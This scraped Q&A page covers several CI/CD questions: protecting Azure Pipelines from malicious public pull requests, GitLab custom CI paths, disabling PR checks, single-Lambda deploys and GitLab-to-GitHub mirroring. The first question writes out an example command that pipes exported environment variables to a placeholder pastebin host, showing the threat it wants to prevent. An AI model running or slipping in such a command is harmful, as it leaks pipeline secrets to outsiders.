Run security checks before rurnning Azure Pipeline CI on public PR - continuous-integration

I have a public repo. Random GitHub users are free to create pull requests, and this is great.
My CI pipeline is described in a normal file in the repo called pipelines.yml (we use Azure pipelines).
Unfortunately this means that a random GitHub user is able to steal all my secret environment variables by creating a PR where they edit the pipelines.yml and add a bash script line with something like:
export | curl -XPOST 'http://pastebin-bla/xxxx'
Or run arbitrary code, in general. Right?
How can I verify that a malicious PR doesn't change at least some critical files?

How can I verify that a malicious PR doesn't change at least some critical files?
I am afraid we could not limit the PR doesn't change at least some critical files.
As workaround, we could turn off automatic fork builds and instead use pull request comments as a way to manually building these contributions, which give you an opportunity to review the code before triggering a build.
You could check the document Consider manually triggering fork builds for some more details.

Related

GitLab Custom CI configuration path and merge request

For one of our repositories we set "Custom CI configuration path" inside GitLab to a remote gitlab-ci.yml. We want to do this to prevent Developers to change the gitlab-ci.yml file (as protected files are available in EE Premium and up). But except this purpose, the Custom CI configuration path feature should work anyway for Merge Requests.
Being in repo
group1/repo1
we set
.gitlab-ci.yml#group1/repo1-ci
repo1-ci repository exists and ci works correctly when we push to configured branches etc.
For Merge Request functionality GitLab tells us:
Detached merge request pipeline #123 failed for ...
Project group1/repo1-ci not found or access denied!
We added the developers to repo1-ci repo as developers, to be able to read the files. It does not help. Anyway the expectation is, that it is not run with user permissions, so it should simply find the gitlab-ci.yml file.
Any ideas on this?
So our expectations were right an it seems that we have to add one important thing into our considerations:
If a user interacts in the GitLab UI with the Merge Request features and you are using "Custom CI configuration path" for your gitlab-ci.yml file, please ensure
this user needs at least read permissions to that remote file, even if you moved it to another repo on purpose (e.g. use enhanced file protection in PREMIUM/ULTIMATE or push/merge protect the branches for the Developer role)
the user got this permission change applied in a running session
The last part failed for our users, as it worked one day later. Seems that they just continued working from their open merge request page and GitLab checks the accessibility out of this session (using a cookie, token or something which was not updated with the the access to the remote repo/file)
It works!

How can i remove Azure Pipeline Build from GitHub checks

I just setup CI/CD for a GitHub repo.
The CI build which validates a pull request is setup up as GitHub Action.
The CD build (which should run after the pull request was merged) is setup using Azure Pipelines as i would like to use the artifacts generated as a trigger for a Release Pipeline using Azure Pipelines as well.
The only thing that's still bugging me is, that the CD Build is also triggering automatically for a pull request and i can't figure out where i can configure those checks.
The checks currently running when a pull request is created are the following:
I want to get rid of the Continous Delivery Build here.
I tried to configure the branch protection rules but this has no effect:
On the Azure Pipeline side i completely disabled the triggers:
But this also has no visible effect to me.
I tested Disable pull request validation in the Triggers of the azure devops pipeline. On my side, it works well, and the build pipeline validation check is not displayed in the github pull request.
You can first check whether the pipeline source repo that you set the "Disable pull request validation" option corresponds to the github repo that created the pull request. Then try a few more times, it is possible that the settings are not applied immediately.
In addition, as workaround you can opt out of pull request validation entirely by specifying pr: none in yaml. Please refer to this official document.
# no PR triggers
pr: none

Deploying Single Lambda Function From CI/CD pipeline

I am dealing an infrastructure and trying to figure it out how to deploy just single lambda from CI/CD pipeline.
Let's say in a repo you have 20 lambdas, and you made change for one single lambda, instead of deploying all of them i just want to deploy the changed one so cut out the deployment time.
I've got an idea like checking difference from git and figure it out which ones are changed, and do deployment only that part of functionality, but it surely doesn't seem right way to do it. Believing there is more proper way to do it.
I am using terraform for now (moving to serverless framework) i know that terraform and serverless framework holds a state on s3 bucket. However on my case when i run it through pipelines, eventhogh there is a terraform state and there is no change on the state, it still deploys the whole thing as far as realised (i might be wrong). I just want to get clear my mind to see how people does this with their pipline.
Since you seem to be asking about both Terraform and Serverless Framework here, I'm assuming you're looking for a general answer rather than specifically how this would be solved with a particular tool.
One way to solve this problem is to decouple your build process from your deploy process by adding a version selection mechanism in between. This just means that somewhere in your system you have a value that can be written by your build process and read by your deploy process which indicates what is the "current" artifact for each of your Lambda functions.
When your build process completes successfully, it can write the information about the artifact it built into the appropriate location, and then trigger your deployment process. Your deployment process will then read the artifact information and use it to decide what to deploy.
If you have made no changes to the current artifact metadata for a particular function then the deploy process can see that and not do anything. If a particular artifact is flawed in some way and you only notice once it's deployed, you can potentially set the artifact metadata back to the previous one and re-run the deployment process to roll back. If you choose a data store that retains historical versions, you'll also have a log of changes to the current artifact which might be useful to understand circumstances that lead to an incident.
Without getting into specifics it's hard to say more about this. For Terraform in particular, the artifact metadata store ought to be something that Terraform can read using a data source. To show a real example I'm going to just arbitrarily choose AWS SSM Parameter Store as a location for that artifact metadata store:
data "aws_ssm_parameter" "foo" {
name = "FooFunctionArtifact"
}
locals {
# For this example, we'll assume that the stored parameter is a JSON
# string shaped like this:
# {
# "s3_bucket": "awesomecorp-app-artifacts"
# "s3_key": "/awesomeapp/v1.2.0/function.zip"
# }
foo_artifact = jsondecode(data.aws_ssm_parameter.foo)
}
resource "aws_lambda_function" "foo" {
function_name = "foo"
s3_bucket = local.foo_artifact.s3_bucket
s3_key = local.foo_artifact.s3_key
# etc, etc
}
The technical details of this will vary a lot depending on your technology choices. If you don't use Terraform then you'll either use a feature similar to data sources in your other tool or you'd write some wrapper glue code that can itself retrieve the necessary information and pass it into the tool as an argument.
The main thing, regardless of technology choices, is that there is an explicit record somewhere of what is the latest artifact for each function, which is updated by your build step and read by your deploy step. This pattern can apply to other artifact types too, such as AMIs for EC2, docker images, etc.
Seems you have added label of terraform, serverless-framework (I called it sls), and aws-lambda. So all of them work for you.
terraform - Terraform itself will care of the differences which lambda need be updated. But it is not lambda friendly if you need install related packages.
serverless framework (sls) - it is good to use to manage lambda functions, but as side effect, it has to be managed with api gateway together. I am not sure if sls team has fix this issue or not. Need some confirmations.
SLS will take care of installing related packages.
The bad part is, sls can't diff the resources to be deployed and to be planned.
cloudformation - that's AWS owned Infrastructure as Code (IaC) tool to manage aws resources, you should be fine to use it to manage the lambda resource. you will get same issues as Terraform that you have to install the related packages before deploy the stack.
Bad part is, cfn (cloudformation) doesn't have diff feature as well, furtherly, it doesn't have proper tools to manage its aws cli commands, you have to use others, such as shell scriping, Ansible or even Terraform to manage coudformation templates updates.
aws cdk - The newest way is using aws-cdk, it does have the diff feature cdk diff which is mostly suitable for your current job, but it is very new project, a lot of features are still waiting to be developed.
You can take these and think with your team's skill sets. Always choice the tools, which you and your team are most confident.

Generating app.json for Heroku pipeline without committing it to master

I am investigating adding an app.json file to my heroku pipeline to enable review apps.
Heroku offers the ability to generate one from your existing app setup, but I do not see any way to prevent it from automatically committing it to our repository's master branch.
I need to be able to see it before it gets committed to the master branch because we require at least two staff members to review all changes to the master branch (which triggers an automatic staging build) for SOC-2 security compliance.
Is there a way that I can see what it would generate without committing it to the repository?
I tried forking the repo and connecting the fork to it's own pipeline, but because it did not have any of our heroku add-ons or environment, it would not work for our production pipeline.
I am hesitant to just build the app.json file manually - it seems more prone to error. I would much prefer to get the automatically generated file and selectively remove items.
As a punchline to this story, I ended up investing enough time into the forked repository on it's own pipeline to demonstrate a POC
When you generate your app.json file, it should take you to a secondary screen that has the full app.json in plaintext at the bottom.
Why not open a PR with its contents in your project root. Once it's detected on the repository Heroku shouldn't ask you to regenerate it again.

How to push from Gitlab to Github with webhooks

My Google-fu is failing me for what seems obvious if I can only find the right manual.
I have a Gitlab server which was installed by our hosting provider
The Gitlab server has many projects.
For some of these projects, I want that Gitlab automatically pushes to a remote repository (in this case Github) every time there is a push from a local client to Gitlab.
Like this: client --> gitlab --> github
Any tags and branches should also be pushed.
AFAICT I have 3 options:
Configure the local client with two remotes, and push simultaneous to Gitlab and Github. I want to avoid this because developers.
Add a git post-receive hook in the repository on the Gitlab server. This would be most flexible (I have sufficient Linux experience to write shell scripts as git hooks) and I have found documentation on how to do this, but I want to avoid this too because then the hosting provider will need to give me shell access.
I use webhooks in Gitlab. I am unfamiliar with what the very basics of webhooks are, and I am unable to locate understandable documentation or even a simple step-by-step example. This is the documentation from Gitlab that I found and I do not understand it: http://demo.gitlab.com/help/web_hooks/web_hooks
I would appreciate good pointers, and I will summarize and document a solution when I find it.
EDIT
I'm using this Ruby code for a web hook:
class PewPewPew < Sinatra::Base
post '/pew' do
push = JSON.parse(request.body.read)
puts "I got some JSON: #{push.inspect}"
end
end
Next: find out how to tell the gitlab server that it has to push a repository. I am going back to the GitLab API.
EDIT
I think I have an idea. On the server where I run the webhook, I pull from GitLab and then I push to Github. I can even do some "magic" (running tests, building jars, deploying to Artifactory,...) before I push to GitHub. In fact it would be great if Jenkins were able to push to a remote repository after a succesful build, then I wouldn't need to write my own webhook, because I'm pretty sure Jenkins already provides a webhook for Gitlab, either native or via a plugin. But I don't know. Yet.
EDIT
I solved it in Jenkins.
You can set more than one git remote in an Jenkins job. I used Git Publisher as a Post-Build Action and it worked like a charm, exactly what I wanted.
would work of course.
is possible but dangerous because GitLab shell automatically symlinks hooks into repositories for you, and those are necessary for permission checks: https://github.com/gitlabhq/gitlab-shell/tree/823aba63e444afa2f45477819770fec3cb5f0159/hooks so I'd rather stay away from it.
Web hooks are not suitable directly: they make an HTTP request with fixed format on certain events, in your case push, not Git protocol requests.
Of course, you could write a server that consumes the hook, clones and pushes, but a service (single push and no deployment) or GitLab CI (already implements hook management) would be strictly better solutions.
services are a the best option if someone implements it: live in the source tree, would do a single push, and require no extra deployment overhead.
GitLab CI or othe CIs like Jenkins are the best option currently available. They are essentially already implemented server for the webhooks, which automatically clone for you: all you have to do then is to push from them.
The keywords you want to Google for are "gitlab mirror github". That has led me to: Gitlab repository mirroring for instance. There seems to be no perfect, easy solution today.
Also this has already been proposed at the feature request forum at: http://feedback.gitlab.com/forums/176466-general/suggestions/4614663-automatic-push-to-remote-mirror-repo-after-push-to Always check there ;) Go and upvote the request.
The key difficulty now is how to store the push credentials.
I solved it in Jenkins. You can set more than one git remote in an Jenkins job. I used Git Publisher as a Post-Build Action and it worked like a charm, exactly what I wanted.
I added "-publisher" jobs that run after "" is built successfully. I could have done it in one job, but I decided to split it up. The build jobs are triggered by a web hook in GitLab; the publisher jobs are using a #daily schedule from the BuildResultTrigger plugin.

Resources